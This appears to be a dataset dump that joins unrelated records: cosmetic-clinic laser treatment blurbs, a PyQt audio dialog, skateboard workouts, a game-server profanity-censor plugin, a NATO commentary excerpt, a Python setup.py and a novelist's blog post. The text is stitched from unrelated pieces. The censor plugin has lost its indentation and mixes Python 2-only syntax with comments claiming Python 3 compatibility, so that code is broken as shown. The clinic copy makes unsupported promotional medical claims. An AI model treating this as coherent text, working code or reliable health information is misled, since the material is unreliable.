MiraDry is a revolutionary, non-invasive treatment for underarm sweat, also known as axillary hyperhidrosis. It works by delivering precisely controlled electromagnetic energy that targets and selectively destroys overactive sweat glands and odor glands. These glands do not grow back once eliminated, resulting in a dramatic and lasting reduction of underarm sweat and smell.
The Excel V is a combination KTP 532 nm and ND:YAG 1064 nm laser that safely and efficiently treats a variety of vascular lesions including telangiectasias, broken blood vessels, angiomas, vascular birthmarks, spider veins, and leg veins. It can also reduce facial redness associated with rosacea or sun damage and can treat solar lentigos or sun spots. Treatments are well tolerated with minimal downtime. While improvement is generally seen after the first treatment, most patients will require multiple sessions for best results.
TruSculpt is the latest noninvasive technology to target problem areas of fat and cellulite that are resistant to diet and exercise. The device delivers controlled, yet comfortable, doses of therapeutic heat to the subcutaneous tissue layer resulting in both body sculpting and fat reduction. It is ideal for targeting stubborn areas like the lower abdomen, double chin, bra fat, back fat, love handles, muffin tops and saddle bags. Two to 4 treatment sessions spaced 4-6 weeks apart are recommended. Many patients see results within 4 weeks, with optimal results typically achieved at 12 weeks. There is minimal downtime after a truSculpt procedure – patients can resume daily activities immediately post treatment.
To find out if truSculpt is right for you, please call us at 212-431-4749 to schedule a consultation.
Laser Genesis is a YAG based laser facial that is safe in all skin types. By gently heating the dermis, Genesis rebuilds collagen, evens out skin tone, reduces redness, shrinks pores, and fades hyperpigmentation from acne or melasma. It can also be used to improve the appearance of scars. Patients describe Genesis as feeling like a warm campfire. There is minimal downtime and a noticeable improvement in skin texture can be seen immediately. Depending on desired results, most patients benefit from a treatment series. A maintenance regimen with treatments at regularly spaced intervals is ideal for keeping up the results.
The Titan is a non-invasive skin tightening laser that targets sagging, loose skin on the face or body. Using infra-red light, Titan heats deeper tissues, causing contracture, remodeling, and increased production of collagen. Titan is especially useful in the treatment and prevention of early jowling, neck laxity, and sagging skin around the eyes. It is also the best non-surgical option for loose skin after pregnancy or weight loss. Improvement in skin texture can be seen in one treatment, but multiple treatments may be necessary to achieve the desired results. Since skin elasticity continues to diminish over time, yearly maintenance may be required to sustain improvement.
The Secret RF (radiofrequency) microneedling device is the latest advance in the treatment of wrinkles, stretch marks, and acne scarring. It uses 25 or 64 perfectly spaced, gold tip needles that precisely deliver energy at varying depths below the skin. Microneedling boosts collagen production while radiofrequency remodels and tightens tissue. The combination of both modalities in a single treatment means unprecedented results in the appearance of wrinkles, including those in difficult to treat areas such as around the mouth (Smoker’s lines), around the eyes, and on the neck. It is also effective in the treatment of a wide range of textural acne scars (pitted, rolling, and boxcar scars) and stretch marks. The procedure is comfortable with topical numbing medication and downtime is minimal. It is safe in all skin types. Patients typically require a treatment series for best results.
Juliet is an erbium laser that takes 20 minutes to revitalize both the internal and external vaginal tissue. Based on multiple studies, vaginal erbium laser treatments significantly improved lubrication, sexual discomfort, vaginal firmness and tone, leakage of urine when sneezing/ coughing or laughing, labial tightening, and external skin appearance.
The process involves 2 passes: The first delivers micro columns of laser energy that stimulate regeneration of collagen and elastin, strengthening the structure of the inner vaginal wall. The second pass delivers gentle heat to improve vaginal tone and flexibility. There is minimal discomfort and little downtime. A series of 3 treatments at 4 week intervals with yearly touch ups is recommended.
|
# -*- coding: utf-8 -*-
# Copyright (C) 2010-2017 Samuele Carcagno <sam.carcagno@gmail.com>
# This file is part of pysoundanalyser
# pysoundanalyser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# pysoundanalyser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with pysoundanalyser. If not, see <http://www.gnu.org/licenses/>.
from __future__ import nested_scopes, generators, division, absolute_import, with_statement, print_function, unicode_literals
from .pyqtver import*
if pyqtversion == 4:
from PyQt4 import QtGui, QtCore
from PyQt4.QtGui import QComboBox, QDialog, QDialogButtonBox, QGridLayout, QLabel, QLineEdit, QMessageBox
elif pyqtversion == -4:
from PySide import QtGui, QtCore
from PySide.QtGui import QComboBox, QDialog, QDialogButtonBox, QGridLayout, QLabel, QLineEdit, QMessageBox
elif pyqtversion == 5:
from PyQt5 import QtGui, QtCore
from PyQt5.QtWidgets import QComboBox, QDialog, QDialogButtonBox, QGridLayout, QLabel, QLineEdit, QMessageBox
class saveSoundDialog(QDialog):
    """Dialog collecting the options used when saving a sound to file.

    Lets the user pick the file format, the bit depth, and whether the
    sound should be written as stereo or mono.
    """
    def __init__(self, parent):
        QDialog.__init__(self, parent)
        layout = QGridLayout()
        row = 0
        #self.fileToWrite = None
        self.guessFileExtension = True

        # File format selector (currently only wav is offered).
        layout.addWidget(QLabel(self.tr('File Format: ')), row, 0)
        self.formatChooser = QComboBox()
        self.formatChooser.addItems(["wav"])
        self.formatChooser.setCurrentIndex(0)
        layout.addWidget(self.formatChooser, row, 1)
        self.formatChooser.currentIndexChanged[int].connect(self.onFileFormatChange)
        self.suggestedExtension = str(self.formatChooser.currentText())

        # Bit-depth selector.
        layout.addWidget(QLabel(self.tr('Bits: ')), row, 2)
        self.encodingChooser = QComboBox()
        self.encodingChooser.addItems(["16", "24", "32"])
        self.encodingChooser.setCurrentIndex(0)
        layout.addWidget(self.encodingChooser, row, 3)
        row = row + 1

        # Channel selector.
        layout.addWidget(QLabel(self.tr('Channel: ')), row, 0)
        self.channelChooser = QComboBox()
        self.channelChooser.addItems([self.tr('Stereo'), self.tr('Mono')])
        self.channelChooser.setCurrentIndex(0)
        layout.addWidget(self.channelChooser, row, 1)
        row = row + 1

        buttonBox = QDialogButtonBox(QDialogButtonBox.Ok |
                                     QDialogButtonBox.Cancel)
        buttonBox.accepted.connect(self.accept)
        buttonBox.rejected.connect(self.reject)
        layout.addWidget(buttonBox, row, 2)

        self.setLayout(layout)
        self.setWindowTitle(self.tr("Save Sound Options"))

    def onFileFormatChange(self):
        # Placeholder: with a single format offered there is nothing to update.
        pass
|
Come to a tabletop position, holding the skateboard vertically with both hands. Inhale as you slide the board out in front of you as far as you can, then use your abdominals to draw it back in toward you on an exhale. Repeat 20–30 times.
Stand on the skateboard with your feet together. Squat down and touch your knees with your back straight, keeping your gaze forward. Come back to standing; repeat 10 times.
Then, squat deeper and touch your ankles, while still keeping your back straight and your gaze forward. Come back to standing; repeat 10 times.
Finally, squat even deeper and touch the board, while still keeping your back straight and your gaze forward. Come back to standing; repeat 10 times.
To intensify, close your eyes or lower down to a count of three and stand up to a count of one.
Start in a plank position with your feet on the board and your hands under your shoulders. Use your core to draw the board in toward you as you lift your hips into a pike position. Then, slowly and with control, lower your hips and slide your feet back to the starting position. Repeat 20–30 times.
Extend your arms into a T-shape and place your right foot on the skateboard. Slide your right foot forward into a deep lunge, lowering your left knee as close to the ground as possible. Repeat 20–30 times, then switch legs.
To intensify this exercise, close your eyes while doing the motion.
French women must have a thing for working out on wheels—here’s why Paris’ indoor cycling scene is one of the hottest in the world. No plans to hop the pond anytime soon? At least you can eat breakfast and do your hair like you’re from the City of Lights.
|
#
# BigBrotherBot(B3) (www.bigbrotherbot.net)
# Copyright (C) 2005 Michael "ThorN" Thornton
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# CHANGELOG
# 2012/07/03 - 3.1 - Courgette
# Fixes a bug which prevented regular expression "\sd[i!1*]ck\s" to match for word "d!ck"
# 2012/07/03 - 3.0.1 - Courgette
# Gives meaningful log messages when loading the config file
# 2011/12/26 - 3.0 - Courgette
# Refactor and make the checks on raw text before checks on cleaned text. Add tests
# 2/12/2011 - 2.2.2 - Bravo17
# Fix for reason keyword not working
# 1/16/2010 - 2.2.1 - xlr8or
# Plugin can now be disabled with !disable censor
# 1/16/2010 - 2.2.0 - xlr8or
# Added ignore_length as an optional configurable option
# Started debugging the badname checker
# 8/13/2005 - 2.0.0 - ThorN
# Converted to use XML config
# Allow custom penalties for words and names
# 7/23/2005 - 1.1.0 - ThorN
# Added data column to penalties table
# Put censored message/name in the warning data
__author__ = 'ThorN, xlr8or, Bravo17, Courgette'
__version__ = '3.1'
import b3, re, traceback, sys, threading
import b3.events
import b3.plugin
from b3.config import XmlConfigParser
from b3 import functions
class PenaltyData:
    """Penalty applied when a censor rule matches.

    Attributes:
        type: penalty type understood by the admin plugin (e.g. "warning").
        reason: free-text reason attached to the penalty.
        keyword: reason keyword registered with the admin plugin.
        duration: penalty duration in minutes (0 by default).
    """
    type = None
    reason = None
    keyword = None
    duration = 0

    def __init__(self, **kwargs):
        # ``.items()`` instead of the Python-2-only ``.iteritems()`` so
        # this class also loads under Python 3 (it works on both).
        for k, v in kwargs.items():
            setattr(self, k, v)

    def __repr__(self):
        return """Penalty(type=%r, reason=%r, keyword=%r, duration=%r)""" % (self.type, self.reason, self.keyword, self.duration)

    def __str__(self):
        # Only truthy fields are rendered as attributes of the XML-like tag.
        data = {"type": self.type, "reason": self.reason, "reasonkeyword": self.keyword, "duration": self.duration}
        return "<penalty " + ' '.join(['%s="%s"' % (k, v) for k, v in data.items() if v]) + " />"
class CensorData:
    """One censor rule: a name, a compiled regexp, and the penalty it triggers.

    Attributes:
        name: rule name from the config file.
        penalty: a :class:`PenaltyData` to apply on a match.
        regexp: compiled regular expression searched in names/messages.
    """
    name = None
    penalty = None
    regexp = None

    def __init__(self, **kwargs):
        # ``.items()`` instead of the Python-2-only ``.iteritems()`` so
        # this class also loads under Python 3 (it works on both).
        for k, v in kwargs.items():
            setattr(self, k, v)

    def __repr__(self):
        return """CensorData(name=%r, penalty=%r, regexp=%r)""" % (self.name, self.penalty, self.regexp)
#--------------------------------------------------------------------------------------------------
class CensorPlugin(b3.plugin.Plugin):
_adminPlugin = None
_reClean = re.compile(r'[^0-9a-z ]+', re.I)
_defaultBadWordPenalty = PenaltyData(type="warning", keyword="cuss")
_defaultBadNamePenalty = PenaltyData(type="warning", keyword="badname")
_maxLevel = 0
_ignoreLength = 3
def onStartup(self):
self._adminPlugin = self.console.getPlugin('admin')
if not self._adminPlugin:
return False
self.registerEvent(b3.events.EVT_CLIENT_SAY)
self.registerEvent(b3.events.EVT_CLIENT_TEAM_SAY)
self.registerEvent(b3.events.EVT_CLIENT_NAME_CHANGE)
self.registerEvent(b3.events.EVT_CLIENT_AUTH)
def onLoadConfig(self):
assert isinstance(self.config, XmlConfigParser)
try:
self._maxLevel = self.config.getint('settings', 'max_level')
except Exception, err:
self._maxLevel = 0
self.warning(err)
self.warning("using default value %s for settings:max_level" % self._maxLevel)
try:
self._ignoreLength = self.config.getint('settings', 'ignore_length')
except Exception, err:
self._ignoreLength = 3
self.warning(err)
self.warning("using default value %s for settings:ignore_length" % self._ignoreLength)
default_badwords_penalty_nodes = self.config.get('badwords/penalty')
if len(default_badwords_penalty_nodes):
penalty = default_badwords_penalty_nodes[0]
self._defaultBadWordPenalty = PenaltyData(type = penalty.get('type'),
reason = penalty.get('reason'),
keyword = penalty.get('reasonkeyword'),
duration = functions.time2minutes(penalty.get('duration')))
else:
self.warning("""no default badwords penalty found in config. Using default : %s""" % self._defaultBadNamePenalty)
default_badnames_penalty_nodes = self.config.get('badnames/penalty')
if len(default_badnames_penalty_nodes):
penalty = default_badnames_penalty_nodes[0]
self._defaultBadNamePenalty = PenaltyData(type = penalty.get('type'),
reason = penalty.get('reason'),
keyword = penalty.get('reasonkeyword'),
duration = functions.time2minutes(penalty.get('duration')))
else:
self.warning("""no default badnames penalty found in config. Using default : %s""" % self._defaultBadNamePenalty)
# load bad words into memory
self._badWords = []
for e in self.config.get('badwords/badword'):
penalty_node = e.find('penalty')
word_node = e.find('word')
regexp_node = e.find('regexp')
self._add_bad_word(rulename=e.get('name'),
penalty=penalty_node,
word=word_node.text if word_node is not None else None,
regexp=regexp_node.text if regexp_node is not None else None)
# load bad names into memory
self._badNames = []
for e in self.config.get('badnames/badname'):
penalty_node = e.find('penalty')
word_node = e.find('word')
regexp_node = e.find('regexp')
self._add_bad_name(rulename=e.get('name'),
penalty=penalty_node,
word=word_node.text if word_node is not None else None,
regexp=regexp_node.text if regexp_node is not None else None)
def _add_bad_word(self, rulename, penalty=None, word=None, regexp=None):
if word is regexp is None:
self.warning("badword rule [%s] has no word and no regular expression to search for" % rulename)
elif word is not None and regexp is not None:
self.warning("badword rule [%s] cannot have both a word and regular expression to search for" % rulename)
elif regexp is not None:
# has a regular expression
self._badWords.append(self._getCensorData(rulename, regexp.strip(), penalty, self._defaultBadWordPenalty))
self.debug("badword rule '%s' loaded" % rulename)
elif word is not None:
# has a plain word
self._badWords.append(self._getCensorData(rulename, '\\s' + word.strip() + '\\s', penalty, self._defaultBadWordPenalty))
self.debug("badword rule '%s' loaded" % rulename)
def _add_bad_name(self, rulename, penalty=None, word=None, regexp=None):
if word is regexp is None:
self.warning("badname rule [%s] has no word and no regular expression to search for" % rulename)
elif word is not None and regexp is not None:
self.warning("badname rule [%s] cannot have both a word and regular expression to search for" % rulename)
elif regexp is not None:
# has a regular expression
self._badNames.append(self._getCensorData(rulename, regexp.strip(), penalty, self._defaultBadNamePenalty))
self.debug("badname rule '%s' loaded" % rulename)
elif word is not None:
# has a plain word
self._badNames.append(self._getCensorData(rulename, '\\s' + word.strip() + '\\s', penalty, self._defaultBadNamePenalty))
self.debug("badname rule '%s' loaded" % rulename)
def _getCensorData(self, name, regexp, penalty, defaultPenalty):
try:
regexp = re.compile(regexp, re.I)
except re.error, e:
self.error('Invalid regular expression: %s - %s' % (name, regexp))
raise
if penalty is not None:
pd = PenaltyData(type = penalty.get('type'),
reason = penalty.get('reason'),
keyword = penalty.get('reasonkeyword'),
duration = functions.time2minutes(penalty.get('duration')))
else:
pd = defaultPenalty
return CensorData(name=name, penalty=pd, regexp=regexp)
def onEvent(self, event):
try:
if not self.isEnabled():
return
elif not event.client:
return
elif event.client.cid is None:
return
elif event.client.maxLevel > self._maxLevel:
return
elif not event.client.connected:
return
if event.type == b3.events.EVT_CLIENT_AUTH or event.type == b3.events.EVT_CLIENT_NAME_CHANGE:
self.checkBadName(event.client)
elif len(event.data) > self._ignoreLength:
if event.type == b3.events.EVT_CLIENT_SAY or \
event.type == b3.events.EVT_CLIENT_TEAM_SAY:
self.checkBadWord(event.data, event.client)
except b3.events.VetoEvent:
raise
except Exception, msg:
self.error('Censor plugin error: %s - %s', msg, traceback.extract_tb(sys.exc_info()[2]))
def penalizeClient(self, penalty, client, data=''):
"""\
This is the default penalisation for using bad language in say and teamsay
"""
#self.debug("%s"%((penalty.type, penalty.reason, penalty.keyword, penalty.duration),))
# fix for reason keyword not working
if penalty.keyword is None:
penalty.keyword = penalty.reason
self._adminPlugin.penalizeClient(penalty.type, client, penalty.reason, penalty.keyword, penalty.duration, None, data)
def penalizeClientBadname(self, penalty, client, data=''):
"""\
This is the penalisation for bad names
"""
#self.debug("%s"%((penalty.type, penalty.reason, penalty.keyword, penalty.duration),))
self._adminPlugin.penalizeClient(penalty.type, client, penalty.reason, penalty.keyword, penalty.duration, None, data)
def checkBadName(self, client):
if not client.connected:
self.debug('Client not connected?')
return
cleaned_name = ' ' + self.clean(client.exactName) + ' '
self.info("Checking '%s'=>'%s' for badname" % (client.exactName, cleaned_name))
was_penalized = False
for w in self._badNames:
if w.regexp.search(client.exactName):
self.debug("badname rule [%s] matches '%s'" % (w.name, client.exactName))
self.penalizeClientBadname(w.penalty, client, '%s (rule %s)' % (client.exactName, w.name))
was_penalized = True
break
if w.regexp.search(cleaned_name):
self.debug("badname rule [%s] matches cleaned name '%s' for player '%s'" % (w.name, cleaned_name, client.exactName))
self.penalizeClientBadname(w.penalty, client, '%s (rule %s)' % (client.exactName, w.name))
was_penalized = True
break
if was_penalized:
# check again in 1 minute
t = threading.Timer(60, self.checkBadName, (client,))
t.start()
return
def checkBadWord(self, text, client):
cleaned = ' ' + self.clean(text) + ' '
text = ' ' + text + ' '
self.debug("cleaned text: [%s]" % cleaned)
for w in self._badWords:
if w.regexp.search(text):
self.debug("badword rule [%s] matches '%s'" % (w.name, text))
self.penalizeClient(w.penalty, client, text)
raise b3.events.VetoEvent
if w.regexp.search(cleaned):
self.debug("badword rule [%s] matches cleaned text '%s'" % (w.name, cleaned))
self.penalizeClient(w.penalty, client, '%s => %s' % (text, cleaned))
raise b3.events.VetoEvent
def clean(self, data):
    """Lowercase *data*, strip console color codes, then blank out every
    character matched by the plugin's cleaning pattern."""
    decolored = self.console.stripColors(data.lower())
    return re.sub(self._reClean, ' ', decolored)
|
Economy and Society » Blog Archive » What is Nato for?
Linked with Serge Halimi – France.
Published on Le Monde diplo, by Serge Halimi, March 2009.
… Leaving no stone unturned, the resolution also recalls our “painful history”, referring to Hitler and Munich, quotes a few lines by “Elie Wiesel, holocaust survivor”, and adds: “Wouldn’t we want someone to come to our rescue when we are crying?” US officers, however, have never had a great reputation for drying civilian tears. Neither during the war in Kosovo, nor in the Iraq war, both conducted in breach of the UN charter. But, regarding many member states at the UN, the European parliament profoundly regrets that “the doctrine of non-alignment, inherited from the cold war era, undermines the alliance of democracies”.
So it is understood that “the future collective defence of the European Union” to which the French head of state is committed will be organised exclusively within the framework of the Atlantic Alliance. The Alliance will not hesitate to deploy its forces in combined civil and military missions extending far beyond the old iron curtain to the borders of Pakistan. Even within Sarkozy’s own party, two former prime ministers, Alain Juppé and Dominique de Villepin, are already worried about this change of direction – evidence enough of the risks involved in taking such a course. (full text).
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Packaging script for txbalanced — Balanced Payments library, Twisted style."""
import os
import sys

try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

# shortcut: `python setup.py publish` builds and uploads a release, then exits
if sys.argv[-1] == 'publish':
    os.system('python setup.py sdist upload')
    sys.exit()

# use context managers so the file handles are closed promptly
# (the original `open(...).read()` form leaked them until GC)
with open('README.rst') as f:
    readme = f.read()
with open('HISTORY.rst') as f:
    history = f.read().replace('.. :changelog:', '')

setup(
    name='txbalanced',
    version='0.1.3',
    description='Balanced Payments library Twisted style',
    long_description=readme + '\n\n' + history,
    author='Trenton Broughton',
    author_email='trenton@devpie.com',
    url='https://github.com/trenton42/txbalanced',
    packages=[
        'txbalanced',
    ],
    package_dir={'txbalanced': 'txbalanced'},
    include_package_data=True,
    install_requires=[
        'treq',
        'python-dateutil',
        'pyopenssl',
        'wrapt'
    ],
    license="BSD",
    zip_safe=False,
    keywords='txbalanced',
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Natural Language :: English',
        "Programming Language :: Python :: 2",
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
    ],
    test_suite='tests',
)
|
I got a call from my Western Romance editor offering me another three book contract.
When the contract gets emailed to me, I’ll sign it and mail it back, and I will put those books into the lineup for me to write. And there is nothing I love more than lining up books to write… well, except maybe signing contracts.
congratulations – you go girl!!
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.